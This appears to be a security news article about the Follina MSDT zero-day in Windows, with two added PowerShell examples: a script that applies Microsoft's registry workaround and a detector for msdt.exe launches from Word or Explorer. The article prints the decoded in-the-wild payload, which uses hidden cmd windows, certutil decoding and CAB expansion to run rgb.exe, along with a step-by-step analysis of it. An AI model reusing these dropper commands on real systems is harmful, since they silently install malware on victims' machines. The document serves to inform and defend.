A critical zero-day code-execution vulnerability in all supported versions of Windows has been under active exploitation for seven weeks, giving attackers a reliable means of installing malware without triggering Windows Defender and a number of other endpoint protection products.
The vulnerability in the Microsoft Support Diagnostic Tool (MSDT) was reported to Microsoft on April 12 as a zero-day already being exploited in the wild, researchers from Shadow Chaser Group said on Twitter. In a response dated April 21, however, the researchers reported that the Microsoft Security Response Center team did not consider the reported behavior to be a security vulnerability because the MSDT diagnostic tool allegedly required a password before it could execute payloads.
Uh, not really
On Monday, Microsoft reversed course, assigned the behavior the vulnerability tracker CVE-2022-30190 and warned for the first time that the reported behavior did, after all, constitute a critical vulnerability.
“A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,” the statement said. “An attacker who successfully exploited this vulnerability could run arbitrary code with the rights of the calling application. The attacker could then install programs, view, modify or delete data, or create new accounts in the context allowed by the user’s rights.”
At the time of this story’s release, Microsoft had not yet released a patch. Instead, it advised customers to disable the MSDT URL protocol by:
- Running Command Prompt as Administrator.
- Backing up the registry key with the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”
- Executing the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”
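The three steps above, wrapped into one script as an added example (this is not Microsoft's guidance verbatim, nor code from the article): it refuses to run unelevated, backs up the ms-msdt handler key before touching it, aborts if the backup did not land on disk, and verifies the removal afterwards. The backup location in $BackupPath is an assumed placeholder; pick your own.

```powershell
# Added example, not from the article or from Microsoft. Run from an
# elevated PowerShell session. $BackupPath is an assumed location.
param(
    [string]$BackupPath = "$env:ProgramData\ms-msdt-backup.reg"
)

# reg.exe cannot delete HKEY_CLASSES_ROOT keys without elevation, so fail early.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw "Run this script from an elevated (Administrator) PowerShell session."
}

$keyPath = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'

if (-not (Test-Path $keyPath)) {
    Write-Host "The ms-msdt protocol handler is not registered; nothing to do."
    return
}

# Step 2 of the workaround: export the key so it can be restored once a patch ships.
& reg.exe export 'HKEY_CLASSES_ROOT\ms-msdt' $BackupPath /y | Out-Null
if ($LASTEXITCODE -ne 0 -or -not (Test-Path $BackupPath)) {
    throw "Backup to $BackupPath failed; aborting without deleting anything."
}
Write-Host "Backed up the ms-msdt handler to $BackupPath"

# Step 3: delete the handler so ms-msdt: URLs no longer launch MSDT.
& reg.exe delete 'HKEY_CLASSES_ROOT\ms-msdt' /f | Out-Null
if ($LASTEXITCODE -ne 0) {
    throw "reg delete failed with exit code $LASTEXITCODE"
}

# Verify; this check can be rerun on its own during an audit.
if (Test-Path $keyPath) {
    throw "The ms-msdt key is still present after deletion."
}
Write-Host "ms-msdt URL protocol disabled. To restore later: reg import `"$BackupPath`""
```

Because the export runs before the delete and the script stops if the export file is missing, a failed backup never leaves you without a way to restore the handler once Microsoft ships a fix.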
Although Microsoft initially dismissed it, the vulnerability was rediscovered when a researcher identified a Word document uploaded to VirusTotal last Friday that used a previously unseen attack vector.
According to analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.
“It should not be possible,” Beaumont wrote.
Unfortunately, it is.
Once decoded, the commands in the document read:
```powershell
$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
```
According to researcher John Hammond of the security company Huntress, the script:
- Launches hidden windows to:
  - Kill msdt.exe if it is running
  - Loop through the files inside a RAR archive, looking for a Base64 string that encodes a CAB file
  - Store that Base64-encoded CAB file as 1.t
  - Decode the Base64-encoded CAB file and save it as 1.c
  - Expand the 1.c CAB file into the current directory, and finally:
  - Execute rgb.exe (presumably packed inside the 1.c CAB file)
Beaumont also drew attention to an academic paper from August 2020 that showed how MSDT could be used to execute code. That suggests there was at least one earlier occasion on which the company’s security team failed to recognize the potential for this behavior to be maliciously exploited.
No, Protected View does not save you
Normally, Word is configured to load content downloaded from the Internet in what is called Protected View, a mode that disables macros and other potentially harmful features. For reasons that are not clear, Beaumont said that if the document is loaded as a Rich Text Format file, “it runs without even opening the document (via the preview tab in Explorer) let alone Protected View.”
In other words, Huntress researchers wrote, the RTF file could “trigger the call of this exploit with only the Windows Explorer preview pane.” In doing so, “this expands the severity of this threat by not just ‘single-clicking’ to exploit, but potentially with a ‘zero-click’ trigger.”
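The process relationship described here, MSDT launched by Word or, in the preview-pane case, by Windows Explorer, is something defenders can hunt for in process-creation telemetry. The following is an added example, not code from the article, Huntress or Beaumont: a function that takes Sysmon Event ID 1 (process create) records and reports msdt.exe launches whose parent is Word or Explorer, or whose command line carries the ms-msdt: URL protocol mentioned by Microsoft. The four input records are constructed, and the argument after ms-msdt: is deliberately a placeholder rather than a real payload.

```powershell
# Added example for hunting the Word/Explorer -> msdt.exe relationship the
# article describes. Not from the article or any vendor. Input objects mirror
# the fields of Sysmon Event ID 1; the sample records below are constructed.
function Find-SuspiciousMsdtLaunch {
    param([Parameter(Mandatory)][object[]]$Events)

    # Word is the caller named in the article; explorer.exe covers the preview-pane
    # case. Add other Office executables as an assumption of your own environment.
    $suspectParents = @('winword.exe', 'explorer.exe')

    foreach ($e in $Events) {
        $image  = [IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        $parent = [IO.Path]::GetFileName($e.ParentImage).ToLowerInvariant()

        if ($image -ne 'msdt.exe') { continue }

        $reasons = @()
        if ($suspectParents -contains $parent) { $reasons += "parent is $parent" }
        if ($e.CommandLine -match 'ms-msdt:')  { $reasons += 'invoked via ms-msdt: URL protocol' }

        # explorer.exe is also the normal parent when a user opens the tool by hand,
        # so treat that reason alone as lower confidence than a Word parent.
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                UtcTime     = $e.UtcTime
                Parent      = $parent
                CommandLine = $e.CommandLine
                Reason      = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample telemetry (not real events).
$sampleEvents = @(
    [pscustomobject]@{ UtcTime = '2022-05-30 09:12:01'
        Image       = 'C:\Windows\System32\msdt.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = 'C:\Windows\System32\msdt.exe ms-msdt:/<placeholder-argument>' }
    [pscustomobject]@{ UtcTime = '2022-05-30 09:15:44'
        Image       = 'C:\Windows\System32\msdt.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'C:\Windows\System32\msdt.exe ms-msdt:/<placeholder-argument>' }
    [pscustomobject]@{ UtcTime = '2022-05-30 10:02:10'
        Image       = 'C:\Windows\System32\msdt.exe'
        ParentImage = 'C:\Windows\System32\svchost.exe'
        CommandLine = 'C:\Windows\System32\msdt.exe' }
    [pscustomobject]@{ UtcTime = '2022-05-30 10:05:33'
        Image       = 'C:\Windows\System32\cmd.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = 'cmd.exe /c whoami' }
)

Find-SuspiciousMsdtLaunch -Events $sampleEvents | Format-Table -AutoSize
```

On the constructed input, the first two records are reported (Word parent plus URL protocol, and Explorer parent plus URL protocol) while the svchost-launched msdt.exe and the cmd.exe child of Word are not; the latter is worth its own rule, but it is not the MSDT pattern this article is about.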
In addition to the document uploaded to VirusTotal on Friday, researchers found a separate Word file, uploaded on April 12, that exploits the same zero-day.
Given the severity of this unpatched vulnerability, organizations that rely on Microsoft Office should carefully examine how it affects their networks. Disabling the MSDT URL protocol is unlikely to cause major disruption in the short term, and possibly not in the long term either. For now, at least until Microsoft releases more details and guidance, Office users should turn off the protocol altogether and scrutinize every document downloaded from the Internet.